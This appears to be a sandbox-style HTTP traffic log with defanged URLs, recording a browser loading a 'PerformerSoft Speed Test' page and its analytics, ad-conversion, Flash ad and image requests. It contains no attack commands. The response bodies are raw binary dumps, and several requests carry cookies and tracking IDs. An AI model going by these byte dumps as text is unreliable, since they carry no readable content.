Content-Encoding: gzip<br>
Server: cafe<br>
Content-Length: 3638<br>
X-XSS-Protection: 1; mode=block<br>
Age: 77805<br>
Cache-Control: public, max-age=86400<br>
Alternate-Protocol: 80:quic<br><pre>...........Z.s....=..h:.:\[email protected]..<br>...J./...y..I.(........N.D....g......y.n..F"..pR..C..x....$...lgq..h,.<br>e.../.....Br..c.<..z.E....i..u....px..\R.a.A....h=.M\5[....TGrm6$\.<br>m...Z...p.N[-..]...pI..&..w.cTPt!...}r..E...x....d...~o.e..{.....7....<br>.*.R'O."HD#....c.........Q.....(.....g;v6.......\|ke}.b...9[.../aE...o<br>^.k......~gQS.\..?....Jwi..d/.Z.......f3.vt.l..D..".V4...~....y.7..).t<br>.<...[h.kt_...y.k.*.......lb.|.Ox..h.i..K...D.g...........X.Y#.n.FH<br>6..=7.,1`...K8.KX''..~..W..z..&.]..f.....0....w..E......?.~.."~.....k-<br>..."[S.....C>..d[..^H../..;.j.&..9W1....X.8.1z...p....>......W.}<br>m..{j..T....v.k.......n.........Z-........w...6.P.|G....C|...P.qh....6<br>..C.ob...n..t..... ...w.].9..J:.".....T.L...!c.7l6.Y...8....uu..x"'J.0<br>i9'..n;4.0,.Cg4B#._..#8.<....)....{......r ...M.......y......N.....<br>5J3q....hq........P...~../e..LjeA.p..E....^...x....QK0o..u^...^n..:S-.<br>....r.....". ..J!tT:$g.F..W.d.....l....m..b......:.Z.[.........T.\u<<br>;hL[.*g"........}.:g......\.N./.Q.n.s..pX.....'o...s.....m......]j....<br>3..#.(..b.Da..c...;.|.<.!.Zk....q.....%...Z....;.8...PC........EP' <br>..X..~..z...:...r2U.X.y<.)..8....~..q"x.Lk&.S1O..e.F.1..^..,..u.O.y<br>]..d.7..Z..1.X.;.F.H....w.I..pZ..O$[..../..H\.j.. . .l.W\....t ../....<br>..D.).Aok.U..di'Y....G...e.#....l%...)......i H.".,.b.f.......R..K...(<br>........*2. O?_..F,..w...;.....{.}V.gU.X.....-~_..k....:...^h....B..bE<br>oW;.......7....o.U..!..jvu.B.;.Me9.3...Z...[...LX.~...7.Vf...E.....Y.1<br>....kQ.\.,.(.Z.._......jn&G....6.:...[j....RF..IH.b7.<......@..</pre><<< skipped >>></font><br><br><font color="red">GET /pagead/conversion/993973503/?random=1407549900333&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751 HTTP/1.1<br>
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.googleadservices.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 302 Found<br>
P3P: policyref="hXXp://VVV.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"<br>
Date: Sat, 09 Aug 2014 02:05:11 GMT<br>
Pragma: no-cache<br>
Expires: Fri, 01 Jan 1990 00:00:00 GMT<br>
Cache-Control: no-cache, must-revalidate<br>
Location: hXXp://googleads.g.doubleclick.net/pagead/viewthroughconversion/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0<br>
Content-Type: text/html; charset=UTF-8<br>
X-Content-Type-Options: nosniff<br>
Content-Encoding: gzip<br>
Server: cafe<br>
Content-Length: 76<br>
X-XSS-Protection: 1; mode=block<br>
Alternate-Protocol: 80:quic<br><pre>............(....I.O.T(...I.UJJL.N/./.K.M.../.*)J. .H,J. Q......R`....<br>h.?...HTTP/1.1 302 Found..P3P: policyref="hXXp://VVV.googleadservices.<br>com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC".<br>.Date: Sat, 09 Aug 2014 02:05:11 GMT..Pragma: no-cache..Expires: Fri, <br>01 Jan 1990 00:00:00 GMT..Cache-Control: no-cache, must-revalidate..Lo<br>cation: hXXp://googleads.g.doubleclick.net/pagead/viewthroughconversio<br>n/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value<br>=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&<br>u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&<br>url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIV<br>AgAAAB0CAAAA&ct_cookie_present=false&convclickts=0..Content-Type: text<br>/html; charset=UTF-8..X-Content-Type-Options: nosniff..Content-Encodin<br>g: gzip..Server: cafe..Content-Length: 76..X-XSS-Protection: 1; mode=b<br>lock..Alternate-Protocol: 80:quic..............(....I.O.T(...I.UJJL.N/<br>./.K.M.../.*)J. .H,J. Q......R`....h.?.....</pre><<< skipped >>></font><br><br
<font color="red">GET /analytics.js HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.google-analytics.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Fri, 08 Aug 2014 16:35:01 GMT<br>
Expires: Sat, 09 Aug 2014 04:35:01 GMT<br>
Last-Modified: Thu, 31 Jul 2014 23:23:53 GMT<br>
X-Content-Type-Options: nosniff<br>
Content-Type: text/javascript<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Server: Golfe2<br>
Content-Length: 11119<br>
Age: 34205<br>
Cache-Control: public, max-age=43200<br>
Alternate-Protocol: 80:quic<br><pre>...........}{W.....|......a...N..Eo..[K.!..%.RB.:..B......d;...<..5<br>C........'........\....Q2T#.||..|t>...a&N...P..E,.I.}..'.i&....N[..<br>....".n.$....2<M..(...N.B..<OP`..~."/M....O..<-3.....S.ne.8..<br>s..SO\.:I...?e..G)r.(.&2K^..s...}M...,K..4C...{f.h$.NG...B............<br>z"[email protected]:[email protected]#9.........:....D^<br>..`N..A..!..F..>.Y.a....4.G..... .$.S.^D...5...{...m..][email protected]><br>;.5e...2.b1......{..z..{..z..L...p...HRG....F.'>b.c...>0...#....<br>.......2I..I..h{.2.&....-.t[.i..b..<.8";q7..g&w/*U<..>U.QY...<br>R..s.m.Z-....V..3.O.#.T...n.........8hQS.........z....W..w.....?8|....<br>.O..|.&c.............t.M/......k..........^.......m=hY..;.....5.....89<br>o|...%-.R....a*{..E.m....,............l........w~w.lt...y........_.h..<br>..... ..VW.....h.\.*l....d..i. .....z.I*.....R7.-;..Z..;... Y..n...jO.<br>....... ...u..D..#h..%[email protected]... .K.......R>.c.r.h._.........<br>kO.]-m.Yy..E3.c.....'........._&.....%tp...72.Z...)..O.d.... .*T*:h"/.<br>.:..ju....=5..f.....7....l&......ir>.H.;..j.oP.:....Y......4h...*..<br>......U...D .....B..d...P.L ivY...1S.....o..L.]...}....N.....q7....?K@<br>....~V...?..g...;.....S..y..........7[*.B..:..q.s.m-.....2....W]...X:.<br>eT...$i..-...w...<^=^].w&t..::\o....R.f}c..X....H..>...j".....A.<br>...i........]/..*F}).MmD...ju8..*H.....B ...<.6..#.*.......>..-.<br>."..%....n% ....6.n.-z8..D.:......Buz....uAB B....$y.0W.....P~....s...<br>.U.%....]b.&u....O4x.....W..ykT...`.k.}7M{..m.7.V...2M. ....7f.:.....6<br>[o.....'c,.=..<.b.....U..8..0.Z.D'b/.#5..)..\w....GO~.a<..O.</pre><<< skipped >>></font><br><br><font color="red">GET /collect?v=1&_v=j24&a=1357867663&t=pageview&_s=1&dl=http://VVV.performersoft.com/speedtest/?cid=4751&ul=en-us&de=utf-8&dt=PerformerSoft Speed Test&sd=32-bit&sr=1276x846&vp=1276x697&je=0&fl=11.6 r602&_u=ME~&cid=476553240.1407549896&tid=UA-42277600-10&z=1548146158 HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.google-analytics.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Pragma: no-cache<br>
Expires: Mon, 07 Aug 1995 23:30:00 GMT<br>
Access-Control-Allow-Origin: *<br>
Last-Modified: Sun, 17 May 1998 03:00:00 GMT<br>
X-Content-Type-Options: nosniff<br>
Content-Type: image/gif<br>
Date: Fri, 08 Aug 2014 04:49:02 GMT<br>
Server: Golfe2<br>
Content-Length: 35<br>
Age: 76565<br>
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate<br>
Alternate-Protocol: 80:quic<br><pre>GIF89a.............,...........D..;HTTP/1.1 200 OK..Pragma: no-cache..<br>Expires: Mon, 07 Aug 1995 23:30:00 GMT..Access-Control-Allow-Origin: *<br>..Last-Modified: Sun, 17 May 1998 03:00:00 GMT..X-Content-Type-Options<br>: nosniff..Content-Type: image/gif..Date: Fri, 08 Aug 2014 04:49:02 GM<br>T..Server: Golfe2..Content-Length: 35..Age: 76565..Cache-Control: priv<br>ate, no-cache, no-cache=Set-Cookie, proxy-revalidate..Alternate-Protoc<br>ol: 80:quic..GIF89a.............,...........D..;</font>....</pre></font><br><br><font color="red">GET /ga.js HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.google-analytics.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Fri, 08 Aug 2014 21:05:21 GMT<br>
Expires: Sat, 09 Aug 2014 09:05:21 GMT<br>
Last-Modified: Thu, 31 Jul 2014 23:23:53 GMT<br>
X-Content-Type-Options: nosniff<br>
Content-Type: text/javascript<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Server: Golfe2<br>
Content-Length: 15983<br>
Age: 17990<br>
Cache-Control: public, max-age=43200<br>
Alternate-Protocol: 80:quic<br><pre>...........}k[....w~...f. .$..&.y....--..M.......8.........$[NB.>.&<br>lt;..".gt..F....O.".%C..}.....r(.H~.x..\....f,...0..{.=.<Hev....$c.<br>.z.;..].'<.d......4.,.J....=..d<\.~2.$<..i..h>............<br> .................x.$c.].......a.._.L\:l...d..k.0.<...y..vX7p......<br>.e...&p..,...]...N:....A.4KF..d......_.3H.......1.].u.d.H......X......<br>hp..!.......Lb.?1.A. ...2. ...........F..=.4.zA..[.`.8....a.aw:..~...k<br>>.A./z..'..H.w....^..J...I.....1.....[y?p~&=..Kl...V..y.....`W.^z..<br>[email protected]. u.Y...!..R.h.F..`./>5...*{...(..:A.5Ob;...r.&.E..J.<br>WVV.;..E2.*O....8^...:z.xE..J.R%.....Y.<!.J...Z.yI..b..5.3......Tep<br>......g.f..W...<......:n.....}.Y.[1jL....v....W.8..#w...t..........<br>Qr.zv.1.t).~...*..r.Z...6. [email protected]*............~.B...s.<br>....\.]6.7U...Tp=......T.`<..........AN..nL.....(:...r.K3...5.r1p..<br>A.|.e\\.ze...:04.....7......F.f..j...R....c...C^t.Z.Dp...A.Ta..e......<br>...[[email protected]|..w0,|.K9..$.o.<br>b3....b<....L..........S.;6..... ..I....$\.S..sdu..;......t..g..N. <br>....i....:>...N..>...U...JG.."..X....B.qh.E....(*..#. .o.. A".u{<br>{.;.......W.....kM.c="h,.(.=.....%..\[email protected]\x..5......\.L...M"tf.GM<br>...X[.QU......_.lH......n@91........[...f>F."..QD.....&.s...Ka....]<br>.Ux.{=O....(.".;..".G..aR\Y.WVtX....;k..h._.O..b...2....{[email protected].)2.<br>..xD7.4.T...i.v.RC`.m.8.\....J...To..sss.....p*.....3.WH...5X...k...y.<br>`\ ....&1..j"?.D.W.}.;D:d.F....p#... ......d...T..jU7n.;-.h._..E..`-`w<br>..a..@}.!...]...Pk..j.k.|.9}H|.......O.C..Q.....0a..,.{2.'oJ..n...</pre><<< skipped >>></font><br><br><font color="red">GET /__utm.gif?utmwv=5.5.4&utms=1&utmn=183511789&utmhn=VVV.performersoft.com&utmcs=utf-8&utmsr=1276x846&utmvp=1260x697&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=PerformerSoft Speed Test&utmhid=1357867663&utmr=-&utmp=/3850509559/goal&utmht=1407549900552&utmac=UA-16085399-2&utmcc=__utma=125033355.476553240.1407549896.1407549901.1407549901.1;+__utmz=125033355.1407549901.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmu=DACAAAAAAAAAAAAAAAAB~ HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.google-analytics.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Pragma: no-cache<br>
Expires: Wed, 19 Apr 2000 11:43:00 GMT<br>
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT<br>
X-Content-Type-Options: nosniff<br>
Content-Type: image/gif<br>
Date: Thu, 31 Jul 2014 21:10:32 GMT<br>
Server: Golfe2<br>
Content-Length: 35<br>
Age: 708879<br>
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate<br>
Alternate-Protocol: 80:quic<br><pre>GIF89a.............,...........D..;HTTP/1.1 200 OK..Pragma: no-cache..<br>Expires: Wed, 19 Apr 2000 11:43:00 GMT..Last-Modified: Wed, 21 Jan 200<br>4 19:51:30 GMT..X-Content-Type-Options: nosniff..Content-Type: image/g<br>if..Date: Thu, 31 Jul 2014 21:10:32 GMT..Server: Golfe2..Content-Lengt<br>h: 35..Age: 708879..Cache-Control: private, no-cache, no-cache=Set-Coo<br>kie, proxy-revalidate..Alternate-Protocol: 80:quic..GIF89a............<br>.,...........D..;..</pre></font><br><br
<font color="red">GET /pagead/conversion/983437618/?random=1407549900333&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751 HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.googleadservices.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 302 Found<br>
P3P: policyref="hXXp://VVV.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"<br>
Date: Sat, 09 Aug 2014 02:05:11 GMT<br>
Pragma: no-cache<br>
Expires: Fri, 01 Jan 1990 00:00:00 GMT<br>
Cache-Control: no-cache, must-revalidate<br>
Location: hXXp://googleads.g.doubleclick.net/pagead/viewthroughconversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0<br>
Content-Type: text/html; charset=UTF-8<br>
X-Content-Type-Options: nosniff<br>
Content-Encoding: gzip<br>
Server: cafe<br>
Content-Length: 76<br>
X-XSS-Protection: 1; mode=block<br>
Alternate-Protocol: 80:quic<br><pre>............(....I.O.T(...I.UJJL.N/./.K.M.../.*)J. .H,J. Q......R`....<br>h.?...HTTP/1.1 302 Found..P3P: policyref="hXXp://VVV.googleadservices.<br>com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC".<br>.Date: Sat, 09 Aug 2014 02:05:11 GMT..Pragma: no-cache..Expires: Fri, <br>01 Jan 1990 00:00:00 GMT..Cache-Control: no-cache, must-revalidate..Lo<br>cation: hXXp://googleads.g.doubleclick.net/pagead/viewthroughconversio<br>n/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&valu<br>e=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276<br>&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0<br>&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAI<br>VAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0..Content-Type: tex<br>t/html; charset=UTF-8..X-Content-Type-Options: nosniff..Content-Encodi<br>ng: gzip..Server: cafe..Content-Length: 76..X-XSS-Protection: 1; mode=<br>block..Alternate-Protocol: 80:quic..............(....I.O.T(...I.UJJL.N<br>/./.K.M.../.*)J. .H,J. Q......R`....h.?.....</pre><<< skipped >>></font><br><br
<font color="red">GET /p/03/ca/cc/7d/03cacc7d05899aea99056522d1bc9eb6.swf HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: cdn.adnxs.com<br>
Connection: Keep-Alive<br>
Cookie: uuid2=7887817462876364047; sess=1; icu=ChII_-wYEAoYAiACKAIw1IOWnwUQ1IOWnwUYAQ..; anj=dTM7k!M4.NCxrEQDgEREg0D`mgx!ea#uqzhcb7D(5Cs1%<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: Apache<br>
ETag: "03cacc7d05899aea99056522d1bc9eb6:1405419852"<br>
Last-Modified: Tue, 15 Jul 2014 10:24:07 GMT<br>
Accept-Ranges: bytes<br>
Content-Length: 50818<br>
Content-Type: application/x-shockwave-flash<br>
Date: Sat, 09 Aug 2014 02:05:09 GMT<br>
Connection: keep-alive<br><pre>CWS.....x.|..TSA.5...(.J.(HGz...Mz....:.;...... ....U .....J....@:.x..<br>..w...Y.d...N.............?.0;.=.........h.~....p9}..p[OKW.@F..@.\..4.<br>.in2...`.cag..}..-.....|,<...n2.pss?"...,.rv...2.......J:.9!..M..H:<br>.8......30.s.......3.3.HH.... .....-..F.H.p.H...../.....2.r2^..:2r:..&<br>gt;. .p......t..@FAIE*S...Bv..?....B. .t..<..M|_.J>O..SP/.......<br>.TN..1J....qF...3..G.o..5. .....$....W..O... 9=......).#......... '..#<br>........4.......k4|/.)...x........`..~.|........<.W...>38U3.><br>....oM..i...c..d|D..:.J..?.."..xn...Yz. ......O)HO.!y.N....-..-.3. .x.<br>..A.xG.........-..K_Z.>....xe...]2.u.(.3.....g....]I.2.{.Fk..f`!. )<br>w.O*[email protected].`....dR.....m.....C4F..]..|8...8....l....F.....(....|x<br>.O...X@k6.\.../e..O....4....d"6..{..E..5C.'=N.?!.5...j%..V..v n....NU.<br>(.qr.E.%..E1.U..!%.y.t..4....S8...t.F7.v.01..lC....c.......s.N..'bv.^.<br>1.e4y..Z.:.............17.......Bg."[email protected]..].....6M4o..RH..T..........<br>..<.W.4.e..&4C..)#..:<.o...1.v.7Yg.......{......q..........13aQ.<br>#)OP.a,...._D...{...\9......P..VT..;V........8..b.....{......*.T)4....<br>z./.....4.?Q.7.B...*O)[....*.G....Z.'/...w....}}s_?....wM.,.".....&...<br>Y......l&....|...F.z^M.1.J...I.4).....h._..V....\.#..u[.._Z....^T..k.2<br>c}.(........!*..2.D>.p..=u{......1_0...;..hI......Y....U.......C9..<br>.....5.~a.$..y....%.....Ry..7..{..u.....{17..y..Sv/....k..P.u..i..q..q<br>...,..;..[...:.-........V...W\.?}j...3r.R..X...%..W[.z....g.fc..T...S.<br>Zf;[email protected][1....Z..~..$!.r.u.A..8.J.../W_i./.......0.....<br>.i....o..%7.?..yj..!..^..H{J.....\D..a.4..[7..{.l*u.>.. Vf.....</pre><<< skipped >>></font><br><br
<font color="red">GET /speedtest/media/body-bg.jpg HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; _ga=GA1.2.476553240.1407549896; norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:07 GMT<br>
Content-Type: image/jpeg<br>
Content-Length: 113687<br>
Last-Modified: Thu, 07 Mar 2013 07:57:00 GMT<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
ETag: "5138484c-1bc17"<br>
Expires: Sat, 09 Aug 2014 03:05:07 GMT<br>
Cache-Control: max-age=3600<br>
Set-Cookie: norjs=1; path=/<br>
Accept-Ranges: bytes<br><pre>......Exif..II*.................Ducky.......=.....qhXXp://ns.adobe.com<br>/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <br><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c06<br>1 64.140949, 2010/12/07-10:57:01        "> <rdf:RDF xmlns:rdf="h<br>ttp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rd<br>f:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="<br>hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.a<br>dobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:01801174072068119<br>5FE933E7FFC8B39" xmpMM:DocumentID="xmp.did:7906F57FA67311E1A946ED315E2<br>0ACE6" xmpMM:InstanceID="xmp.iid:7906F57EA67311E1A946ED315E20ACE6" xmp<br>:CreatorTool="Adobe Photoshop CS5.1 Macintosh"> <xmpMM:DerivedFr<br>om stRef:instanceID="xmp.iid:03801174072068118A6DB00324D7A612" stRef:d<br>ocumentID="xmp.did:018011740720681195FE933E7FFC8B39"/> </rdf:Des<br>cription> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?<br>>...&Adobe.d...............k...u...................................<br>......................................................................<br>............................................o.........................<br>................................................................ 0!.@`<br>.1A".p2P#.B.$.3C...................1!. ..30..".@`pQa2Aq...P.R...br..B.<br>#.................!..p.........................!1AQa.q..... ...0`.@Pp.<br>......................................................................<br>...................`..............................................</pre><<< skipped >>></font><br><br><font color="red">GET /speedtest/media/PaUkffsP_bigger.gif HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; _ga=GA1.2.476553240.1407549896; norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:08 GMT<br>
Content-Type: image/gif<br>
Content-Length: 5761<br>
Last-Modified: Thu, 07 Mar 2013 10:03:59 GMT<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
ETag: "5138660f-1681"<br>
Expires: Sat, 09 Aug 2014 03:05:08 GMT<br>
Cache-Control: max-age=3600<br>
Set-Cookie: norjs=1; path=/<br>
Accept-Ranges: bytes<br><pre>GIF89aS.S..................................5)...7vU&}Z .e2.`0.e5xX...J<br>..H..U..Q..Q..W...rM!.d/..D{W*.b1.g4.e3nP .yB..G..L..K.e9..L..N.._..Sz<br>^={fM.X){T'.[-vQ)..X.j6.{?.}BcF%.\1.e7.b5.g9..I.|F..N..d.j>.h=.~JzY<br>5.qE..P.b=.wJeL0P-.V1.`=..u9..>._1.]0..L.e5..a.c7..d.^6..h.vH.]8..P<br>..s.{M...H$.L(.H(..R..Z!.d(..A.[(..Q.T-..S..^..]..\.~NlWCD ./..m9.6..L<br>*.^5.lA..b2.U,..S..Z.nA._:..b;...H.....c..U..`#.o ~G...<N..-...u8.~<br>=.p6.O'..M..L..x...@ ..x1C$..c .Q)..F.g6.T15"...jvN14..|1.b)..N..=..V.<br>.l->"...BD'.0....Z.yI..s7'.r)..:..7.u0..B.b-.'...b%.F.z<.;..4...<br>.R.nG..f;%.h$."..s5.6...K..D!0...R).j9.c6*..5..Z3. ......[=..Z3#...._.<br>.Y".l ..=..4..P .T*.tH..VX..K...*.-..Q .g-..j;g4.....jF%[email protected]!.<br>...V&.i< F).*..v..F...8..T1 ...C .O:U..F..... ..f..u"..=#.dE.&.'...<br>............"....:..6%$......!.......,....S.S..... ..1.D. Bjh.....t..%<br>xGq.0K.hT.R.... U....J..UT..rC....b....G..=. 1.&P.F....*..A....ih [...<br>/f..dL..!G..Pr.W.R...)S.M.8u...t...G....e).t....G..(..,.).$..1.Y.p....<br>..!W.k....e........?...XP.].x......5j.G2....b.....,...(6>x( .s.....<br>&J........gk.,X._....E....w...fI.&..........>.0........-..ttp.Uw]k.<br>...G.y....$.`...A.yK.e..P..^|........V~.9..]y.c. .`W 5pd.G...BH.d.q..d<br>4.A!_(..c.]X..HB...N8...!......h.t(.C....aI...0..w.aF.hF...w..A.A..D.7<br>.pd.K6.$.kM..~.....j.e.8....;......H.E.<....OD.C.OtZ..f..c.......@a<br>..%....6..P..<.....Xi...2....$@.).Xb..r....QL....F.i.g... .R.[.v..d<br>.............p.....G7.$q...B{...B.i.b../$..q...<.j...K....._....n..<br>$......C.W.`......... ."(7.D..u.m.......:,..#@....&.....pE..>Ao</pre><<< skipped >>></font><br><br
<font color="red">GET /cse/intl/en/images/google_custom_search_watermark.gif HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.google.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Content-Type: image/gif<br>
Last-Modified: Wed, 08 Feb 2012 18:07:38 GMT<br>
Date: Fri, 08 Aug 2014 04:46:13 GMT<br>
Expires: Sun, 10 Aug 2014 04:46:13 GMT<br>
X-Content-Type-Options: nosniff<br>
Server: pfe<br>
Content-Length: 2024<br>
X-XSS-Protection: 1; mode=block<br>
X-Frame-Options: SAMEORIGIN<br>
Age: 76739<br>
Cache-Control: public, max-age=172800<br>
